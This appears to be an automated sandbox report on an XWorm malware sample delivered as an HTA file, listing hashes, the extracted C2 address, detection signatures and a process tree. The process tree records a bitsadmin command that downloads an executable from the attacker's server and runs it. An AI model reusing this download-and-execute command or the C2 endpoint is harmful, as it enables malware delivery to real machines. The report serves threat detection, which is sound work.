Analysis
- max time kernel: 147s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02/04/2024, 18:09
- Static task: static1
- Behavioral task: behavioral1
  - Sample: e81963d4c5a431f529c7669d3595a943.hta
  - Resource: win7-20240319-en
  - 9 signatures
  - 150 seconds
General
- Target: e81963d4c5a431f529c7669d3595a943.hta
- Size: 834B
- MD5: e81963d4c5a431f529c7669d3595a943
- SHA1: 82ac49f24caad73263ae461a2c1c7546b1ba9ded
- SHA256: cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b
- SHA512: 2ba83def4a81ede89bd54a5c0d4b4592985c13a10507b9a2dfb45c46e6e234d54dc14f98562eb2d3d3766e28290e83175c098a6203dd52effacc0176da7bb209
Malware Config
Extracted
- Family: xworm
- C2: 210.246.215.82:7000
- Attributes
  - Install_directory: %ProgramData%
  - install_file: WindowsNT.exe
Signatures
- Detect Xworm Payload (1 IoC)
  resource | yara_rule
  behavioral2/memory/4260-0-0x0000000000FE0000-0x000000000103A000-memory.dmp | family_xworm
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | mshta.exe
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  28 | ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Download via BitsAdmin (1 TTP, 1 IoC)
  pid | Process
  1924 | bitsadmin.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 4260 | s.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  description | pid | Process | procid_target
  PID 5024 wrote to memory of 1924 | 5024 | mshta.exe | 88
  PID 5024 wrote to memory of 1924 | 5024 | mshta.exe | 88
  PID 5024 wrote to memory of 1924 | 5024 | mshta.exe | 88
  PID 5024 wrote to memory of 4260 | 5024 | mshta.exe | 100
  PID 5024 wrote to memory of 4260 | 5024 | mshta.exe | 100
Processes
- C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  PID: 5024
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\bitsadmin.exe
    Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe
    PID: 1924
    - Download via BitsAdmin
  - C:\ProgramData\s.exe
    Command line: "C:\ProgramData\s.exe"
    PID: 4260
    - Suspicious use of AdjustPrivilegeToken